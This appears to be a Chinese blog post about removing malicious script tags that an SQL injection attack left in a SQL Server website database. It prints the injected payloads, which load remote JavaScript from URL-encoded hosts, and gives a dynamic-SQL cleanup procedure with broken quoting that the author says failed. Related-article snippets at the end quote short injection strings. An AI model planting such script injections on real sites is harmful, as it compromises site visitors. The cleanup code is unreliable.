删除注入的SQL字符

最新推荐文章于 2023-03-03 18:53:59 发布
最新推荐文章于 2023-03-03 18:53:59 发布
阅读量1.4k 收藏
点赞数
分类专栏: SQL 文章标签: sql 数据库 sqlserver sql server 远程登录 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/swort_177/article/details/3193629
版权

前些天孙姐给我说我们一个网站有问题,看了下里面被注入了很多代码

 

 

  1. "></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%66%75%63%6B%75%75%2E%75%

我直接把他们都替换掉了。把网站的防止注入代码也写上了!

 

发现我们另一个网站上的数据库中的表中的一个字段都被注入了一段代码

           </title><script src=http://%6b%6b%36%2e%75%73/1.js></script>

还是原来被SQL注入后的,我们网站有的栏目是生成静态了,有的是动态生成的,还要从数据库中提取数据,这个时候提取就会出问题的。而且在GOOGLE上搜索也会被冠以警告的标签。

如下图

 

 

但是这个字段是NTEXT的,上次我替换这个的时候直接把改成VARCHAR但是数据有的不完整了,这次看了下有的数据比较长,有10000多,如果改为VARCHAR又会出现数据截断。

 

 

 

nvarchar

可变长度 Unicode 数据,其最大长度为 4,000 字符。sysname 是系统提供用户定义的数据类型,在功能上等同于 nvarchar(128),用于引用数据库对象名。

ntext

可变长度 Unicode 数据,其最大长度为 2^30 - 1 (1,073,741,823) 个字符。

 

 

varchar

可变长度的非 Unicode 数据,最长为 8,000 个字符。

 

MSSQL中如果计算ntext字段内容的长度,用len不行...

用len出错:
[SQL Server]函数 len 的参数 1 的数据类型 ntext 无效

对于ntext,text,image请使用datalength函数取得字符串长度,注意ntext是unicode字符,一个字符长度2(不管是不是中文),所以datalength得出的长度是字符数*2

--读取库中的所有表名
select name from sysobjects where xtype='u'

--读取指定表的所有列名
select name from syscolumns where id=(select max(id) from sysobjects where xtype='u' and name='表名')
获取数据库表名和字段
sqlserver中各个系统表的作用
sysaltfiles 主数据库 保存数据库的文件
syscharsets 主数据库 字符集与排序顺序
sysconfigures 主数据库 配置选项
syscurconfigs 主数据库 当前配置选项
sysdatabases 主数据库 服务器中的数据库
syslanguages 主数据库 语言
syslogins 主数据库 登陆帐号信息
sysoledbusers 主数据库 链接服务器登陆信息
sysprocesses 主数据库 进程
sysremotelogins主数据库 远程登录帐号

syscolumns 每个数据库 列
sysconstrains 每个数据库 限制
sysfilegroups 每个数据库 文件组
sysfiles 每个数据库 文件
sysforeignkeys 每个数据库 外部关键字
sysindexs 每个数据库 索引
sysmenbers 每个数据库 角色成员
sysobjects 每个数据库 所有数据库对象
syspermissions 每个数据库 权限
systypes 每个数据库 用户定义数据类型
sysusers 每个数据库 用户

 

 


create proc deleteJS


as

create table #temp
(
tempId int identity,
tName varchar(80)
)
insert into #temp(tName) select name from sysobjects where xtype='u' and name like '%news'--将结果存储到临时表中

declare @id int
select @id = min(tempId) from #temp
while @id is not null

begin
declare @tableName varchar(80)
    select @tableName=tName from #temp where tempId = @id
    --开始进行处理这个表

  declare @ResultSql varchar(600)
  set @ResultSql='update '+rtrim(@tableName)+' set content=replace(convert(varchar(6200),content),'<</title>)','') where DATALENGTH(content)<6000'--小于6000的进行处理
   exec(@ResultSql)
 set @ResultSql='update '+rtrim(@tableName)+' set content=replace(convert(varchar(6200),content),'</title>','') where DATALENGTH(content)<6000'--小于6000的进行处理
   exec(@ResultSql)
 set @ResultSql='update '+rtrim(@tableName)+' set content=replace(convert(varchar(6200),content),'<script src=http://%6b%6b%36%2e%75%73/1.js>','') where DATALENGTH(content)<6000'--小于6000的进行处理
  exec(@ResultSql)
 set @ResultSql='update '+rtrim(@tableName)+' set content=replace(convert(varchar(6200),content),'</script>','') where DATALENGTH(content)<6000'--小于6000的进行处理
  exec(@ResultSql)
 -- 处理结束
    select @id = min( tempId ) from #temp where tempId > @id
end

此存储过程没通过 因为发现这个太耗资源  单一一个语句执行起来都N久没反应,数据库中的数据还是有点多!比较恼火中。。

swort_177
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JavaScript过滤SQL注入字符
08-05
SQL注入是指攻击者在用户输入的数据中插入SQL命令,以欺骗服务器执行非授权的操作,如获取敏感数据、修改或删除记录等。例如,一个简单的登录表单如果没有进行适当的验证,攻击者可以输入"username' OR '1'='1 --...
C#检测是否有危险字符SQL字符串过滤方法
09-04
SQL注入是一种常见的黑客攻击手段,通过在用户输入的数据中嵌入恶意的SQL语句,来操纵数据库,获取、修改或删除敏感数据。C#作为.NET框架的主要编程语言,提供了一些方法来检查和过滤可能含有危险字符SQL字符串,...
清理被注入的数据库
play7788的专栏
04-03 441
如何最快速度删除? " script   src=http://3b3.org/c.js> script> " --------------------------------------------------------------- 进入SQL查询分析器 选择你的数据库 第一步:先sql表修改所有者为dbo EXEC   sp_MSforeachtable   exec   sp_chan
php对字符串进行SQL注入过滤
qq_30908729的博客
11-25 1140
php对字符串进行SQL注入过滤   解决方法: 使用str_ireplace方法来实现:http://w​ww.yayihouse.com/yayishuwu/chapter/1711
php sql注入 字符,如何清理字符串以避免SQL注入和最常见的攻击类型? (在PHP中)...
weixin_33900916的博客
03-18 72
有没有办法以尽可能少的代码为SQL注入和最常见的攻击形式过滤字符串?在我的脚本中我使用以下内容,我想知道它是否相当安全以及是否有其他人有建议:$cleanName = htmlspecialchars(addslashes($dirtyName));看看我如何过滤html字符以及引号和双引号.注意:我使用的是addslashes()而不是mysql_real_escape_string(),...
一个防止SQL注入字符串处理函数
weixin_30249203的博客
05-23 70
privatestaticRegexFilterInjectionRegex;publicstaticstringFilterInjection(strings){s=s.Replace("'","''");if(FilterInjectionRegex==null)...
sql注入删除数据表
热门推荐
weixin_38972910的博客
12-27 1万+
前提:网站必须那能够被sql注入,也就是没有进行预编译操作。 最开始的数据库:   注入操作: 直接在网站登录界面进行注入   账户名随便输一个'343' 这种格式,用''引起来 然后密码输入:'456';  DROP TABLE userLogin 这种形式 最后在数据库中解析成完整语句如下: SELECT * FROM userLogin WHERE username...
SQL注入绕过实战案例
最新发布
08-31
在网络安全领域,SQL注入是一种常见的攻击手段,通过利用不安全的SQL代码来获取、修改、删除数据库中的敏感信息。本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。...
易语言SQL注入
07-20
在提供的"易语言SQL注入源码"中,可以学习如何编写安全的SQL查询,如何避免直接拼接SQL字符串,以及如何检测和修复已存在的注入漏洞。源码可能会包含示例,展示如何正确处理用户输入,防止注入攻击。 4. **常见SQL...
SQL注入漏洞演示源代码
07-15
当应用程序将用户输入的数据直接拼接到SQL查询中时,攻击者可以通过构造特殊的输入来操控数据库,获取未经授权的信息,甚至篡改或删除数据。 首先,让我们看看"README.md"文件。这个文件通常包含项目的基本信息、...
Sql注入截取字符串常用函数
Pz_mstr's Blog
08-21 493
原文传送门:http://www.cnblogs.com/lcamry/p/5504374.htm 在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也称为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明,其他类型数据库请自行检测。  转载该文章主要为了自己查阅
清理SQL注入攻击
Hunk HUi
08-05 425
当数据库遭入侵时候会大量的代码夹杂在里面如何快速的清理呢,这里提供个简单的sql语句(仅供参考,据实际情况而定)   declare @tabname varchar(50), @colname varchar(50),@collength int,@T1 varchar(200),@T2 varchar(200),@T3 varchar(200) set @T1='' set @T2='' set @T3='' declar
解决并清除SQL注入恶意病毒代码的语句
点点滴滴
05-13 597
declare @t varchar(255),@c varchar(255)  declare table_cursor cursor for select a.name,b.name   from sysobjects a,syscolumns b ,systypes c   where a.id=b.id and a.xtype=u and c.name   in (char, n
SQL注入SQL的增删改
heyingcheng的博客
03-03 639
sql注入的堆叠注入或者是迭代注入的时候会涉及到对数据库的修改,这时候就需要用到这些基础命令。其实在图形化界面下可以不用命令,在这里提前学习命令是为了以后在linux系统下做准备。在这里我们以phpstudy搭建的靶场中的图形化界面来展示数据库。创建数据表employees,并写入表格信息及相关参数。创建数据库employees并选择字符集。以下都是在sql注入中常用到的命令。选择进入数据库employees。删除数据库employees。修改数据表名称为user。
删除SQL注入的一些方法总结
weixin_34150224的博客
07-21 352
sql替换法: declare @myStr nvarchar(500); set @myStr='oa_20121026new.bak&lt;/title&gt;&lt;style&gt;.alx2{position:absolute;clip:rect(456px,auto,auto,456px);}&lt;/style&gt;&lt;'; select replace(@myStr...
JDBC 增、查、删、改 和 防止sql注入登录
吉祥龙龙的博客
03-31 372
package cn.mxl.jdbc04; import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; import java.sql.Statement; /** * * JDBC 增 * * JDBC 增加表中的数据 用SQL语句 * * @...
mysql sql注入删除表_MySQL 表操作、pymysql注入攻击
weixin_36143628的博客
01-20 483
1、基础语句查select(* | 字段名 | 四则运算 | 聚合函数) from 表名称;加上as取别名 as可省略如:select name, (math+english)/2 total from stu;增insert into 表名(字段, ..) values(值, ....),(值, .....)可以从另一张表中拿数据,insert into t1(user, pwd) select...
网络安全技术13SQL注入.pptx
11-12
"网络安全技术13SQL注入.pptx" 这篇资源主要讲解了网络安全中的一个关键议题——SQL注入,这是针对Web服务器的一种常见攻击手段。SQL注入是指攻击者通过输入恶意的SQL语句,利用Web应用程序的安全漏洞,篡改数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值